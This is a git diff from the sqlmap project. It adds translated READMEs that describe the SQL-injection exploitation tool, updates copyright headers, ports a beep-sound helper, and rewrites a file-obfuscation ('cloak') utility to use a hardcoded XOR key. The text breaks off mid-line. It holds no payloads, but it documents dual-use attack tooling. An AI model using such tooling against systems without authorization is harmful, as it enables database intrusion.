-Program ile ilgili örnekleri [burada](https://asciinema.org/a/46601) bulabilirsiniz. Daha fazlası içinsqlmap'in bütün açıklamaları ile birlikte bütün özelliklerinin, örnekleri ile bulunduğu [manuel sayfamıza](https://github.com/sqlmapproject/sqlmap/wiki/Usage) bakmanızı tavsiye ediyoruz
+Program ile ilgili örnekleri [burada](https://asciinema.org/a/46601) bulabilirsiniz. Daha fazlası için sqlmap'in bütün açıklamaları ile birlikte bütün özelliklerinin, örnekleri ile bulunduğu [manuel sayfamıza](https://github.com/sqlmapproject/sqlmap/wiki/Usage) bakmanızı tavsiye ediyoruz
-Links
+Bağlantılar
----
-* Anasayfa: http://sqlmap.org
+* Anasayfa: https://sqlmap.org
* İndirme bağlantıları: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* Commitlerin RSS beslemeleri: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Hata takip etme sistemi: https://github.com/sqlmapproject/sqlmap/issues
* Kullanıcı Manueli: https://github.com/sqlmapproject/sqlmap/wiki
* Sıkça Sorulan Sorular(SSS): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
-* Twitter: [@sqlmap](https://twitter.com/sqlmap)
-* Demolar: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* X: [@sqlmap](https://x.com/sqlmap)
+* Demolar: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
* Ekran görüntüleri: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-uk-UA.md b/doc/translations/README-uk-UA.md
new file mode 100644
index 00000000000..26e96f7d6cf
--- /dev/null
+++ b/doc/translations/README-uk-UA.md
@@ -0,0 +1,50 @@
+# sqlmap 
+
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
+
+sqlmap - це інструмент для тестування вразливостей з відкритим сирцевим кодом, який автоматизує процес виявлення і використання дефектів SQL-ін'єкцій, а також захоплення серверів баз даних. Він оснащений потужним механізмом виявлення, безліччю приємних функцій для професійного тестувальника вразливостей і широким спектром скриптів, які спрощують роботу з базами даних - від відбитка бази даних до доступу до базової файлової системи та виконання команд в операційній системі через out-of-band з'єднання.
+
+Скриншоти
+----
+
+
+
+Ви можете ознайомитися з [колекцією скриншотів](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), які демонструють деякі функції в wiki.
+
+Встановлення
+----
+
+Ви можете завантажити останню версію tarball натиснувши [сюди](https://github.com/sqlmapproject/sqlmap/tarball/master) або останню версію zipball натиснувши [сюди](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Найкраще завантажити sqlmap шляхом клонування [Git](https://github.com/sqlmapproject/sqlmap) репозиторію:
+
+ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap «працює з коробки» з [Python](https://www.python.org/download/) версії **2.6**, **2.7** та **3.x** на будь-якій платформі.
+
+Використання
+----
+
+Щоб отримати список основних опцій і перемикачів, використовуйте:
+
+ python sqlmap.py -h
+
+Щоб отримати список всіх опцій і перемикачів, використовуйте:
+
+ python sqlmap.py -hh
+
+Ви можете знайти приклад виконання [тут](https://asciinema.org/a/46601).
+Для того, щоб ознайомитися з можливостями sqlmap, списком підтримуваних функцій та описом всіх параметрів і перемикачів, а також прикладами, вам рекомендується скористатися [інструкцією користувача](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+Посилання
+----
+
+* Основний сайт: https://sqlmap.org
+* Завантаження: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) або [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Канал новин RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Відстеження проблем: https://github.com/sqlmapproject/sqlmap/issues
+* Інструкція користувача: https://github.com/sqlmapproject/sqlmap/wiki
+* Поширенні питання (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* X: [@sqlmap](https://x.com/sqlmap)
+* Демо: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
+* Скриншоти: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-vi-VN.md b/doc/translations/README-vi-VN.md
new file mode 100644
index 00000000000..45cbd33c6c1
--- /dev/null
+++ b/doc/translations/README-vi-VN.md
@@ -0,0 +1,52 @@
+# sqlmap 
+
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
+
+sqlmap là một công cụ kiểm tra thâm nhập mã nguồn mở, nhằm tự động hóa quá trình phát hiện, khai thác lỗ hổng SQL injection và tiếp quản các máy chủ cơ sở dữ liệu. Công cụ này đi kèm với
+một hệ thống phát hiện mạnh mẽ, nhiều tính năng thích hợp cho người kiểm tra thâm nhập (pentester) và một loạt các tùy chọn bao gồm phát hiện, truy xuất dữ liệu từ cơ sở dữ liệu, truy cập file hệ thống và thực hiện các lệnh trên hệ điều hành từ xa.
+
+Ảnh chụp màn hình
+----
+
+
+
+Bạn có thể truy cập vào [bộ sưu tập ảnh chụp màn hình](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) - nơi trình bày một số tính năng có thể tìm thấy trong wiki.
+
+Cài đặt
+----
+
+
+Bạn có thể tải xuống tập tin nén tar mới nhất bằng cách nhấp vào [đây](https://github.com/sqlmapproject/sqlmap/tarball/master) hoặc tập tin nén zip mới nhất bằng cách nhấp vào [đây](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Tốt hơn là bạn nên tải xuống sqlmap bằng cách clone về repo [Git](https://github.com/sqlmapproject/sqlmap):
+
+ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap hoạt động hiệu quả với [Python](https://www.python.org/download/) phiên bản **2.6**, **2.7** và **3.x** trên bất kì hệ điều hành nào.
+
+Sử dụng
+----
+
+Để có được danh sách các tùy chọn cơ bản và switch, hãy chạy:
+
+ python sqlmap.py -h
+
+Để có được danh sách tất cả các tùy chọn và switch, hãy chạy:
+
+ python sqlmap.py -hh
+
+Bạn có thể xem video demo [tại đây](https://asciinema.org/a/46601).
+Để có cái nhìn tổng quan về sqlmap, danh sách các tính năng được hỗ trợ và mô tả về tất cả các tùy chọn, cùng với các ví dụ, bạn nên tham khảo [hướng dẫn sử dụng](https://github.com/sqlmapproject/sqlmap/wiki/Usage) (Tiếng Anh).
+
+Liên kết
+----
+
+* Trang chủ: https://sqlmap.org
+* Tải xuống: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) hoặc [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Nguồn cấp dữ liệu RSS về commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Theo dõi issue: https://github.com/sqlmapproject/sqlmap/issues
+* Hướng dẫn sử dụng: https://github.com/sqlmapproject/sqlmap/wiki
+* Các câu hỏi thường gặp (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* X: [@sqlmap](https://x.com/sqlmap)
+* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
+* Ảnh chụp màn hình: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-zh-CN.md b/doc/translations/README-zh-CN.md
index b94454da285..d63d6da4a71 100644
--- a/doc/translations/README-zh-CN.md
+++ b/doc/translations/README-zh-CN.md
@@ -1,26 +1,26 @@
-# sqlmap
+# sqlmap 
-[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
-sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
+sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。
演示截图
----

-你可以访问 wiki上的 [截图](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 查看各种用法的演示
+你可以查看 wiki 上的 [截图](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 了解各种用法的示例
安装方法
----
-你可以点击 [这里](https://github.com/sqlmapproject/sqlmap/tarball/master) 下载最新的 `tar` 打包的源代码 或者点击 [这里](https://github.com/sqlmapproject/sqlmap/zipball/master)下载最新的 `zip` 打包的源代码.
+你可以点击 [这里](https://github.com/sqlmapproject/sqlmap/tarball/master) 下载最新的 `tar` 打包好的源代码,或者点击 [这里](https://github.com/sqlmapproject/sqlmap/zipball/master)下载最新的 `zip` 打包好的源代码.
-推荐你从 [Git](https://github.com/sqlmapproject/sqlmap) 仓库获取最新的源代码:
+推荐直接从 [Git](https://github.com/sqlmapproject/sqlmap) 仓库获取最新的源代码:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
-sqlmap 可以运行在 [Python](http://www.python.org/download/) **2.6.x** 和 **2.7.x** 版本的任何平台上
+sqlmap 可以运行在 [Python](https://www.python.org/download/) **2.6**, **2.7** 和 **3.x** 版本的任何平台上
使用方法
----
@@ -33,17 +33,17 @@ sqlmap 可以运行在 [Python](http://www.python.org/download/) **2.6.x** 和
python sqlmap.py -hh
-你可以从 [这里](https://asciinema.org/a/46601) 看到一个sqlmap 的使用样例。除此以外,你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki/Usage)。获取sqlmap所有支持的特性、参数、命令行选项开关及说明的使用帮助。
+你可以从 [这里](https://asciinema.org/a/46601) 看到一个 sqlmap 的使用样例。除此以外,你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki/Usage)。获取 sqlmap 所有支持的特性、参数、命令行选项开关及详细的使用帮助。
链接
----
-* 项目主页: http://sqlmap.org
+* 项目主页: https://sqlmap.org
* 源代码下载: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
-* RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom
-* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
+* Commit的 RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* 问题跟踪器: https://github.com/sqlmapproject/sqlmap/issues
* 使用手册: https://github.com/sqlmapproject/sqlmap/wiki
* 常见问题 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
-* Twitter: [@sqlmap](https://twitter.com/sqlmap)
-* 教程: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* X: [@sqlmap](https://x.com/sqlmap)
+* 教程: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
* 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/extra/__init__.py b/extra/__init__.py
index 942d54d8fce..ba25c56a216 100644
--- a/extra/__init__.py
+++ b/extra/__init__.py
@@ -1,8 +1,8 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
+See the file 'LICENSE' for copying permission
"""
pass
diff --git a/extra/beep/__init__.py b/extra/beep/__init__.py
index 942d54d8fce..ba25c56a216 100644
--- a/extra/beep/__init__.py
+++ b/extra/beep/__init__.py
@@ -1,8 +1,8 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
+See the file 'LICENSE' for copying permission
"""
pass
diff --git a/extra/beep/beep.py b/extra/beep/beep.py
index 2f1d10c80d9..b6f8f97cf82 100644
--- a/extra/beep/beep.py
+++ b/extra/beep/beep.py
@@ -3,12 +3,11 @@
"""
beep.py - Make a beep sound
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
+See the file 'LICENSE' for copying permission
"""
import os
-import subprocess
import sys
import wave
@@ -16,11 +15,13 @@
def beep():
try:
- if subprocess.mswindows:
+ if sys.platform.startswith("win"):
_win_wav_play(BEEP_WAV_FILENAME)
- elif sys.platform == "darwin":
- _mac_beep()
- elif sys.platform == "linux2":
+ elif sys.platform.startswith("darwin"):
+ _mac_wav_play(BEEP_WAV_FILENAME)
+ elif sys.platform.startswith("cygwin"):
+ _cygwin_beep(BEEP_WAV_FILENAME)
+ elif any(sys.platform.startswith(_) for _ in ("linux", "freebsd")):
_linux_wav_play(BEEP_WAV_FILENAME)
else:
_speaker_beep()
@@ -35,9 +36,12 @@ def _speaker_beep():
except IOError:
pass
-def _mac_beep():
- import Carbon.Snd
- Carbon.Snd.SysBeep(1)
+# Reference: https://lists.gnu.org/archive/html/emacs-devel/2014-09/msg00815.html
+def _cygwin_beep(filename):
+ os.system("play-sound-file '%s' 2>/dev/null" % filename)
+
+def _mac_wav_play(filename):
+ os.system("afplay '%s' 2>/dev/null" % BEEP_WAV_FILENAME)
def _win_wav_play(filename):
import winsound
@@ -45,7 +49,7 @@ def _win_wav_play(filename):
winsound.PlaySound(filename, winsound.SND_FILENAME)
def _linux_wav_play(filename):
- for _ in ("aplay", "paplay", "play"):
+ for _ in ("paplay", "aplay", "mpv", "mplayer", "play"):
if not os.system("%s '%s' 2>/dev/null" % (_, filename)):
return
@@ -58,7 +62,10 @@ def _linux_wav_play(filename):
class struct_pa_sample_spec(ctypes.Structure):
_fields_ = [("format", ctypes.c_int), ("rate", ctypes.c_uint32), ("channels", ctypes.c_uint8)]
- pa = ctypes.cdll.LoadLibrary("libpulse-simple.so.0")
+ try:
+ pa = ctypes.cdll.LoadLibrary("libpulse-simple.so.0")
+ except OSError:
+ return
wave_file = wave.open(filename, "rb")
diff --git a/extra/cloak/__init__.py b/extra/cloak/__init__.py
index 942d54d8fce..ba25c56a216 100644
--- a/extra/cloak/__init__.py
+++ b/extra/cloak/__init__.py
@@ -1,8 +1,8 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
+See the file 'LICENSE' for copying permission
"""
pass
diff --git a/extra/cloak/cloak.py b/extra/cloak/cloak.py
old mode 100755
new mode 100644
index b9358371125..cce563973c5
--- a/extra/cloak/cloak.py
+++ b/extra/cloak/cloak.py
@@ -3,42 +3,45 @@
"""
cloak.py - Simple file encryption/compression utility
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
+See the file 'LICENSE' for copying permission
"""
+from __future__ import print_function
+
import os
+import struct
import sys
import zlib
from optparse import OptionError
from optparse import OptionParser
-def hideAscii(data):
- retVal = ""
- for i in xrange(len(data)):
- if ord(data[i]) < 128:
- retVal += chr(ord(data[i]) ^ 127)
- else:
- retVal += data[i]
+if sys.version_info >= (3, 0):
+ xrange = range
+ ord = lambda _: _
+
+KEY = b"E6wRbVhD0IBeCiGJ"
- return retVal
+def xor(message, key):
+ return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message)))
def cloak(inputFile=None, data=None):
if data is None:
with open(inputFile, "rb") as f:
data = f.read()
- return hideAscii(zlib.compress(data))
+ return xor(zlib.compress(data), KEY)
def decloak(inputFile=None, data=None):
if data is None:
with open(inputFile, "rb") as f:
data = f.read()
try:
- data = zlib.decompress(hideAscii(data))
- except:
- print 'ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile
+ data = zlib.decompress(xor(data, KEY))
+ except Exception as ex:
+ print(ex)
+ print('ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile)
sys.exit(1)
finally:
f.close()
@@ -47,7 +50,7 @@ def decloak(inputFile=None, data=None):
def main():
usage = '%s [-d] -i [-o